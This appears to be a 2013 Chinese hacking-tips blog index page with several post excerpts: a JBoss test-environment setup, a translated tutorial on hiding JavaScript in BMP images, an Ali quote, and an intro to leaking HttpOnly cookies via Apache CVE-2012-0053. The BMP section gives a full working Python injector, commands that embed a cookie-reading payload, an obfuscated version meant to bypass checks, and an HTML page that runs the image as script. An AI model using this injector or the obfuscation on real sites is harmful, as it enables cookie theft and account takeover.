Jboss环境搭建(WindowsXP)

作者:Secer 发布时间:October 28, 2013 分类:黑客技巧,原创文章

首先安装jre

http://jdk8.java.net/ http://jdk7.java.net/ http://jdk6.java.net/ 去随便下个jre

安装jre-7u11-windows-i586.exe略过、设置环境变量略过。

下载Jboss

http://sourceforge.net/projects/jboss/files/

jboss-4.2.0.GA.zip

解压到D:\jboss-4.2.0.GA

运行run.bat

clip_image002

提示找不到

C:\Program Files\Java\jre7\bin\server\jvm.dll

发现C:\Program Files\Java\jre7\bin\client\下有个jvm.dll 复制一份C:\Program Files\Java\jre7\bin\server\jvm.dll

再运行D:\jboss-4.2.0.GA\run.bat

Ok。。

clip_image004

浏览器打开默认端口8080

阅读剩余部分...

图片攻击-BMP图片中注入恶意JS代码

作者:Secer 发布时间:October 25, 2013 分类:黑客技巧

译自 碳基体

昨天看到一篇文章《hacking throung images》,里面介绍了如何在BMP格式的图片里注入JS代码,使得BMP图片既可以正常显示,
也可以运行其中的JS代码,觉得相当有趣。
执行JS注入的脚本
关键:构造符合正常BMP格式的图片
步骤
1. 将原BMP文件的第三,第四字节替换为\x2F\x2A, 对应js中的注释符号/*
BMP文件的第三、四、五、六字节表示BMP文件的大小
2. 在BMP文件末尾添加
(1)\xFF
(2)\x2A\x2F,对应的js中的注释符号*/
(3)\x3D\x31\x3B,对应的=1;  是为了伪造成BMP格式
(4)定制的JS代码
BMPinjector.py源码如下(Macro Ramili原本的源码

#!/usr/bin/env python2.7

import os

import argparse

def injectFile(payload,fname):

f = open(fname,"r+b")

b = f.read()

f.close()

f = open(fname,"w+b")

f.write(b)

f.seek(2,0)

f.write(b'\x2F\x2A')

f.close()

f = open(fname,"a+b")

f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')

f.write(payload)

f.close()

return True

if __name__ == "__main__":

parser = argparse.ArgumentParser()

parser.add_argument("filename",help="the bmp file name to infected")

parser.add_argument("js_payload",help="the payload to be injected. For exampe: \"alert(1);\"")

args = parser.parse_args()

injectFile(args.js_payload,args.filename)

演示
下面演示实际效果
运行脚本,将指定的JS代码写入到正常的BMP图片中
格式:python 脚本名 正常BMP格式图片 JSPayload

python BMPinjector.py 1.bmp "alert(document.cookie);"

演示页面run.html

<html>

<head><title>Opening an image</title></head>

<body>

<img src="1.bmp"\>

<script src="1.bmp"></script>

</body>

</html>

运行 http://xxx/1.html
clip_image002
也可以采用js混淆来绕过检查,得到和上面一样的效果

python BMPinjector.py 1.bmp "var _0x9c4c=\"\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\"; function MsgBox(_0xccb4x3){alert(eval(_0xccb4x3));} ;MsgBox(_0x9c4c);"

注意:\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65对应document.cookie


参考:
http://marcoramilli.blogspot.com/2013/10/hacking-through-images.html

ali

作者:Secer 发布时间:October 24, 2013 分类:影音娱乐

 

好啊,你们来吧,
我已经在监狱待了400年
再去那儿过个4年5年无所谓
但我不会跑10000英里...
去帮助杀戮那些可怜的民族
如果我想死,我就死在这儿,立刻!
和你们战斗!如果我想死
你们才是我的敌人,不是中国人,
不是越共,也不是日本人
我要自由的时候你们就是我的对手!
我要正义的时候你们就是我的对手!
我要平等的时候你们就是我的对手!
你们想让我去另一个地方为你们打仗
而在美国你们却不支持我...
不支持我的权利和宗教信仰
在家里你们都不支持我!

 

我要做我自己要做的人。我要象我愿意的那样自由思考。

http-only型cookie截取及利用

作者:Secer 发布时间:October 22, 2013 分类:Web安全

Apache服务器2.2.0-2.2.21版本存在一个漏洞(CVE-2012-0053),攻击者可通过给网站植入超大的Cookie,使得HTTP头超过apache的LimitRequestFieldSize(最大请求长度)8192字节,apache便会返回400错误,状态页中就包含了http-only保护的cookies。

image 

httpOnly型cookie截取及利用(Apache CVE:2112-0053)

漏洞名称:APACHE Httponly Cookie Disclosure(CVE:2112-0053)
测试目标环境:Windows xp sp3、discuz x2.5、apache2.2.17(漏洞存在的版本)

阅读剩余部分...